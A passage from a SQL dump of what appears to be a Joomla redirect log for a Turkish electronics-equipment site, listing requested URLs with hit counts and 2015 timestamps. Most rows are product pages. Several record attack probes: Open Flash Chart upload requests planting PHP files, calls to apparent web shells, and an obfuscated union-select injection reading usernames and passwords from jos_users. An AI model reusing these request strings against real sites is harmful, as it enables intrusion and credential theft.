18:14:33','0000-00-00 00:00:00',301),(7111,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-28 18:14:33','0000-00-00 00:00:00',301),(7112,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-28 18:14:34','0000-00-00 00:00:00',301),(7113,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-28 18:14:34','0000-00-00 00:00:00',301),(7114,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-28 18:14:35','0000-00-00 00:00:00',301),(7115,'http://3s-technologies.com.tr/index.php/tr/?option=com_user&view=register','','','',1,0,'2015-01-28 18:36:42','0000-00-00 00:00:00',301),(7116,'http://3s-technologies.com.tr/index.php/en/?Itemid=60&id=40&lang=en&option=com_content&view=category','','','',5,0,'2015-01-29 13:53:44','0000-00-00 00:00:00',301),(7117,'http://www.3s-technologies.com.tr/index.php/en/images/stories/food.php?baca','','','',1,0,'2015-01-29 14:33:45','0000-00-00 00:00:00',301),(7118,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=.index.php','','','',2,0,'2015-01-29 22:19:11','0000-00-00 00:00:00',301),(7119,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=.index.php','','','',2,0,'2015-01-29 22:19:14','0000-00-00 00:00:00',301),(7120,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=.index.php','','','',2,0,'2015-01-29 22:19:16','0000-00-00 00:00:00',301),(7121,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=.index.php','','','',2,0,'2015-01-29 22:19:17','0000-00-00 00:00:00',301),(7122,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=.index.php','','','',2,0,'2015-01-29 22:19:18','0000-00-00 00:00:00',301),(7123,'http://www.3s-technologies.com.tr/index.php/en/components/com_xmap/php-ofc-library/ofc_upload_image.php?name=.index.php','','','',2,0,'2015-01-29 22:19:20','0000-00-00 00:00:00',301),(7124,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=.index.php','','','',2,0,'2015-01-29 22:19:21','0000-00-00 00:00:00',301),(7125,'http://www.3s-technologies.com.tr/index.php/en/products/b','','','',1,0,'2015-02-03 20:35:08','0000-00-00 00:00:00',301),(7126,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/component/k2/item/add?tmpl=component','','','',3,0,'2015-02-06 01:11:31','0000-00-00 00:00:00',301),(7127,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/component/k2/item/index.php','','','',3,0,'2015-02-06 01:11:32','0000-00-00 00:00:00',301),(7128,'http://www.3s-technologies.com.tr/index.php?option=com_userlist','','','',1,0,'2015-02-06 08:46:33','0000-00-00 00:00:00',301),(7129,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/images/stories/food.pHp','','','',1,0,'2015-02-06 22:20:31','0000-00-00 00:00:00',301),(7130,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/images/stories/petx.gif','','','',2,0,'2015-02-06 22:20:47','0000-00-00 00:00:00',301),(7131,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=en','','','',33,0,'2015-02-07 12:09:51','0000-00-00 00:00:00',301),(7132,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',33,0,'2015-02-07 12:10:03','0000-00-00 00:00:00',301),(7133,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=en','','','',33,0,'2015-02-07 12:10:09','0000-00-00 00:00:00',301),(7134,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',33,0,'2015-02-07 12:10:15','0000-00-00 00:00:00',301),(7135,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=en','','','',33,0,'2015-02-07 12:10:22','0000-00-00 00:00:00',301),(7136,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=en','','','',33,0,'2015-02-07 12:10:27','0000-00-00 00:00:00',301),(7137,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',33,0,'2015-02-07 12:10:36','0000-00-00 00:00:00',301),(7138,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=en','','','',33,0,'2015-02-07 12:10:44','0000-00-00 00:00:00',301),(7139,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=en','','','',33,0,'2015-02-07 12:10:55','0000-00-00 00:00:00',301),(7140,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=tr','','','',32,0,'2015-02-07 12:11:24','0000-00-00 00:00:00',301),(7141,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=en','','','',32,0,'2015-02-07 12:11:29','0000-00-00 00:00:00',301),(7142,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=en','','','',36,0,'2015-02-07 12:11:37','0000-00-00 00:00:00',301),(7143,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=138&Itemid=140&lang=en','','','',41,0,'2015-02-07 12:11:40','0000-00-00 00:00:00',301),(7144,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=en','','','',36,0,'2015-02-07 12:11:47','0000-00-00 00:00:00',301),(7145,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=en','','','',36,0,'2015-02-07 12:11:50','0000-00-00 00:00:00',301),(7146,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=en','','','',32,0,'2015-02-07 12:11:55','0000-00-00 00:00:00',301),(7147,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=141&Itemid=143&lang=en','','','',41,0,'2015-02-07 12:12:04','0000-00-00 00:00:00',301),(7148,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=en','','','',32,0,'2015-02-07 12:12:11','0000-00-00 00:00:00',301),(7149,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=145&Itemid=147&lang=en','','','',40,0,'2015-02-07 12:12:24','0000-00-00 00:00:00',301),(7150,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',37,0,'2015-02-07 12:12:44','0000-00-00 00:00:00',301),(7151,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=147&Itemid=146&lang=en','','','',29,0,'2015-02-07 12:12:59','0000-00-00 00:00:00',301),(7152,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',29,0,'2015-02-07 12:13:19','0000-00-00 00:00:00',301),(7153,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',22,0,'2015-02-07 12:13:36','0000-00-00 00:00:00',301),(7154,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=150&Itemid=151&lang=en','','','',29,0,'2015-02-07 12:13:40','0000-00-00 00:00:00',301),(7155,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=en','','','',22,0,'2015-02-07 12:13:48','0000-00-00 00:00:00',301),(7156,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=151&Itemid=152&lang=en','','','',29,0,'2015-02-07 12:14:06','0000-00-00 00:00:00',301),(7157,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',26,0,'2015-02-07 12:14:14','0000-00-00 00:00:00',301),(7158,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',31,0,'2015-02-07 12:14:26','0000-00-00 00:00:00',301),(7159,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',22,0,'2015-02-07 12:14:52','0000-00-00 00:00:00',301),(7160,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',37,0,'2015-02-07 12:14:58','0000-00-00 00:00:00',301),(7161,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',33,0,'2015-02-07 12:15:16','0000-00-00 00:00:00',301),(7162,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',37,0,'2015-02-07 12:15:25','0000-00-00 00:00:00',301),(7163,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',32,0,'2015-02-07 12:15:34','0000-00-00 00:00:00',301),(7164,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',38,0,'2015-02-07 12:17:29','0000-00-00 00:00:00',301),(7165,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=tr','','','',29,0,'2015-02-07 12:17:38','0000-00-00 00:00:00',301),(7166,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en','','','',29,0,'2015-02-07 12:17:41','0000-00-00 00:00:00',301),(7167,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=en','','','',29,0,'2015-02-07 12:17:45','0000-00-00 00:00:00',301),(7168,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=en','','','',29,0,'2015-02-07 12:17:50','0000-00-00 00:00:00',301),(7169,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=en','','','',29,0,'2015-02-07 12:17:58','0000-00-00 00:00:00',301),(7170,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en','','','',29,0,'2015-02-07 12:18:07','0000-00-00 00:00:00',301),(7171,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=72&Itemid=78&lang=en','','','',40,0,'2015-02-07 12:19:57','0000-00-00 00:00:00',301),(7172,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=en','','','',28,0,'2015-02-07 12:21:46','0000-00-00 00:00:00',301),(7173,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=86&Itemid=98&lang=en','','','',38,0,'2015-02-07 12:22:16','0000-00-00 00:00:00',301),(7174,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=98&lang=en','','','',18,0,'2015-02-07 12:22:27','0000-00-00 00:00:00',301),(7175,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=en','','','',33,0,'2015-02-07 12:22:57','0000-00-00 00:00:00',301),(7176,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=94&Itemid=105&lang=en','','','',38,0,'2015-02-07 12:23:00','0000-00-00 00:00:00',301),(7177,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=95&Itemid=106&lang=en','','','',38,0,'2015-02-07 12:23:07','0000-00-00 00:00:00',301),(7178,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=107&Itemid=118&lang=en','','','',41,0,'2015-02-07 12:23:09','0000-00-00 00:00:00',301),(7179,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=96&Itemid=107&lang=en','','','',38,0,'2015-02-07 12:23:11','0000-00-00 00:00:00',301),(7180,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=97&Itemid=108&lang=en','','','',32,0,'2015-02-07 12:23:15','0000-00-00 00:00:00',301),(7181,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=en','','','',33,0,'2015-02-07 12:23:16','0000-00-00 00:00:00',301),(7182,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=98&Itemid=109&lang=en','','','',33,0,'2015-02-07 12:23:20','0000-00-00 00:00:00',301),(7183,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=108&Itemid=119&lang=en','','','',41,0,'2015-02-07 12:23:20','0000-00-00 00:00:00',301),(7184,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=109&Itemid=120&lang=en','','','',41,0,'2015-02-07 12:23:24','0000-00-00 00:00:00',301),(7185,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',33,0,'2015-02-07 12:23:27','0000-00-00 00:00:00',301),(7186,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=110&Itemid=121&lang=en','','','',41,0,'2015-02-07 12:23:31','0000-00-00 00:00:00',301),(7187,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=111&Itemid=122&lang=en','','','',41,0,'2015-02-07 12:23:35','0000-00-00 00:00:00',301),(7188,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',41,0,'2015-02-07 12:23:39','0000-00-00 00:00:00',301),(7189,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=113&Itemid=125&lang=en','','','',36,0,'2015-02-07 12:23:43','0000-00-00 00:00:00',301),(7190,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=en','','','',25,0,'2015-02-07 12:23:48','0000-00-00 00:00:00',301),(7191,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=114&Itemid=124&lang=en','','','',34,0,'2015-02-07 12:23:52','0000-00-00 00:00:00',301),(7192,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',25,0,'2015-02-07 12:23:56','0000-00-00 00:00:00',301),(7193,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=40&Itemid=60&lang=en&limitstart=10','','','',19,0,'2015-02-07 12:23:59','0000-00-00 00:00:00',301),(7194,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=115&Itemid=126&lang=en','','','',41,0,'2015-02-07 12:24:01','0000-00-00 00:00:00',301),(7195,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=117&Itemid=128&lang=en','','','',41,0,'2015-02-07 12:24:15','0000-00-00 00:00:00',301),(7196,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en','','','',6,0,'2015-02-07 12:24:16','0000-00-00 00:00:00',301),(7197,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',33,0,'2015-02-07 12:24:19','0000-00-00 00:00:00',301),(7198,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=119&Itemid=117&lang=en','','','',41,0,'2015-02-07 12:24:23','0000-00-00 00:00:00',301),(7199,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=120&Itemid=116&lang=en','','','',41,0,'2015-02-07 12:24:27','0000-00-00 00:00:00',301),(7200,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=en','','','',33,0,'2015-02-07 12:24:33','0000-00-00 00:00:00',301),(7201,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=121&Itemid=115&lang=en','','','',41,0,'2015-02-07 12:24:43','0000-00-00 00:00:00',301),(7202,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=en','','','',33,0,'2015-02-07 12:24:47','0000-00-00 00:00:00',301),(7203,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=122&Itemid=129&lang=en','','','',41,0,'2015-02-07 12:24:50','0000-00-00 00:00:00',301),(7204,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=136&Itemid=138&lang=en','','','',41,0,'2015-02-07 12:24:53','0000-00-00 00:00:00',301),(7205,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=137&Itemid=139&lang=en','','','',41,0,'2015-02-07 12:24:57','0000-00-00 00:00:00',301),(7206,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=en','','','',6,0,'2015-02-07 12:24:59','0000-00-00 00:00:00',301),(7207,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=139&Itemid=141&lang=en','','','',41,0,'2015-02-07 12:25:01','0000-00-00 00:00:00',301),(7208,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=140&Itemid=142&lang=en','','','',41,0,'2015-02-07 12:25:06','0000-00-00 00:00:00',301),(7209,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=en','','','',6,0,'2015-02-07 12:25:11','0000-00-00 00:00:00',301),(7210,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=en','','','',32,0,'2015-02-07 12:25:13','0000-00-00 00:00:00',301),(7211,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=156&Itemid=157&lang=en','','','',37,0,'2015-02-07 12:25:17','0000-00-00 00:00:00',301),(7212,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=157&Itemid=158&lang=en','','','',37,0,'2015-02-07 12:25:24','0000-00-00 00:00:00',301),(7213,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=158&Itemid=159&lang=en','','','',37,0,'2015-02-07 12:25:28','0000-00-00 00:00:00',301),(7214,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',33,0,'2015-02-07 12:25:41','0000-00-00 00:00:00',301),(7215,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',39,0,'2015-02-07 12:25:48','0000-00-00 00:00:00',301),(7216,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=en','','','',6,0,'2015-02-07 12:26:40','0000-00-00 00:00:00',301),(7217,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=en','','','',6,0,'2015-02-07 12:26:46','0000-00-00 00:00:00',301),(7218,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=en','','','',6,0,'2015-02-07 12:26:58','0000-00-00 00:00:00',301),(7219,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=en','','','',6,0,'2015-02-07 12:27:32','0000-00-00 00:00:00',301),(7220,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=guys.php','','','',3,0,'2015-02-07 21:51:07','0000-00-00 00:00:00',301),(7221,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content//components/com_jnews/includes/openflashchart/tmp-upload-images/guys.php?rf','','','',3,0,'2015-02-07 21:51:08','0000-00-00 00:00:00',301),(7222,'http://www.3s-technologies.com.tr/index.php?option=com_tag&controller=tag&task=add&article_id=-260479/**//*!union*//**//*!select*//**/concat(username,0x3a,password,0x3a,usertype)/**//*!from*//**/jos_users/**/&tmpl=component','','','',1,0,'2015-02-11 10:01:34','0000-00-00 00:00:00',301),(7223,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lan','','','',7,0,'2015-02-11 10:16:06','0000-00-00 00:00:00',301),(7224,'http://3s-technologies.com.tr/index.php/tr/anasayfa2/80-turkish-tr/','','','',3,0,'2015-02-11 15:10:10','0000-00-00 00:00:00',301),(7225,'http://www.3s-technologies.com.tr/index.php/en/products.smd-dÃ¼ÅŸÃ¼k-hÄ±zlÄ±','','','',5,0,'2015-02-13 21:12:03','0000-00-00 00:00:00',301),(7226,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',1,0,'2015-02-14 13:43:01','0000-00-00 00:00:00',301),(7227,'http://3s-technologies.com.tr/index.php/checkout/cart/','','http://3s-technologies.com.tr/index.php/checkout/cart/','',2,0,'2015-02-15 10:52:01','0000-00-00 00:00:00',301),(7228,'http://www.3s-technologies.com.tr/index.php/en/products','','','',51,0,'2015-02-15 14:04:16','0000-00-00 00:00:00',301),(7229,'http://3s-technologies.com.tr/index.php/en/?Itemid=149&id=58&lang=en&option=com_content&view=category','','','',5,0,'2015-02-16 03:10:44','0000-00-00 00:00:00',301),(7230,'http://www.3s-technologies.com.tr:80/index.php?id=44&Itemid=56&lang=tr&option=com_content&view=category','','','',1,0,'2015-02-16 19:32:03','0000-00-00 00:00:00',301),(7231,'http://www.3s-technologies.com.tr:80/index.php/tr/?id=168&Itemid=58&lang=en&option=com_content&view=article','','','',1,0,'2015-02-16 19:43:34','0000-00-00 00:00:00',301),(7232,'http://www.3s-technologies.com.tr:80/index.php/en/?id=44&Itemid=56&lang=tr&option=com_content&view=category','','','',1,0,'2015-02-16 20:12:40','0000-00-00 00:00:00',301),(7233,'http://www.3s-technologies.com.tr:80/index.php/en/?id=168&Itemid=58&lang=en&option=com_content&view=article','','','',1,0,'2015-02-16 20:19:32','0000-00-00 00:00:00',301),(7234,'http://www.3s-technologies.com.tr:80/index.php?id=168&Itemid=58&lang=en&option=com_content&view=article','','','',1,0,'2015-02-16 20:26:16','0000-00-00 00:00:00',301),(7235,'http://www.3s-technologies.com.tr:80/index.php?id=56&Itemid=137&lang=tr&option=com_content&view=category','','','',1,0,'2015-02-16 21:05:56','0000-00-00 00:00:00',301),(7236,'http://www.3s-technologies.com.tr:80/index.php?id=124&Itemid=130&lang=en&option=com_content&view=article','','','',1,0,'2015-02-16 21:07:23','0000-00-00 00:00:00',301),(7237,'http://www.3s-technologies.com.tr:80/index.php/en/?id=56&Itemid=137&lang=tr&option=com_content&view=category','','','',1,0,'2015-02-16 21:11:34','0000-00-00 00:00:00',301),(7238,'http://www.3s-technologies.com.tr:80/index.php/en/?id=124&Itemid=130&lang=en&option=com_content&view=article','','','',1,0,'2015-02-16 21:19:46','0000-00-00 00:00:00',301),(7239,'http://ledbazaar.org:80/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',1,0,'2015-02-16 22:08:30','0000-00-00 00:00:00',301),(7240,'http://www.3s-technologies.com.tr:80/index.php/en/?id=88&Itemid=100&lang=tr&option=com_content&view=article','','','',1,0,'2015-02-17 05:52:39','0000-00-00 00:00:00',301),(7241,'http://www.3s-technologies.com.tr:80/index.php/en/?id=90&Itemid=102&lang=en&option=com_content&view=article','','','',1,0,'2015-02-17 05:53:48','0000-00-00 00:00:00',301),(7242,'http://www.3s-technologies.com.tr:80/index.php?id=90&Itemid=102&lang=en&option=com_content&view=article','','','',1,0,'2015-02-17 06:03:08','0000-00-00 00:00:00',301),(7243,'http://www.3s-technologies.com.tr:80/index.php?id=88&Itemid=100&lang=tr&option=com_content&view=article','','','',1,0,'2015-02-17 06:09:15','0000-00-00 00:00:00',301),(7244,'http://www.3s-technologies.com.tr:80/index.php?id=39&Itemid=57&lang=tr&option=com_content&view=category','','','',1,0,'2015-02-17 06:16:32','0000-00-00 00:00:00',301),(7245,'http://www.3s-technologies.com.tr:80/index.php/en/?id=39&Itemid=57&lang=tr&option=com_content&view=category','','','',1,0,'2015-02-17 07:17:52','0000-00-00 00:00:00',301),(7246,'http://www.3s-technologies.com.tr:80/index.php?id=124&Itemid=130&lang=tr&option=com_content&view=article','','','',1,0,'2015-02-17 09:36:12','0000-00-00 00:00:00',301),(7247,'http://www.3s-technologies.com.tr:80/index.php/en/?id=124&Itemid=130&lang=tr&option=com_content&view=article','','','',1,0,'2015-02-17 09:36:30','0000-00-00 00:00:00',301),(7248,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/core/lib/php-ofc-library/ofc_upload_image.php?name=joss.php','','','',2,0,'2015-02-18 13:57:28','0000-00-00 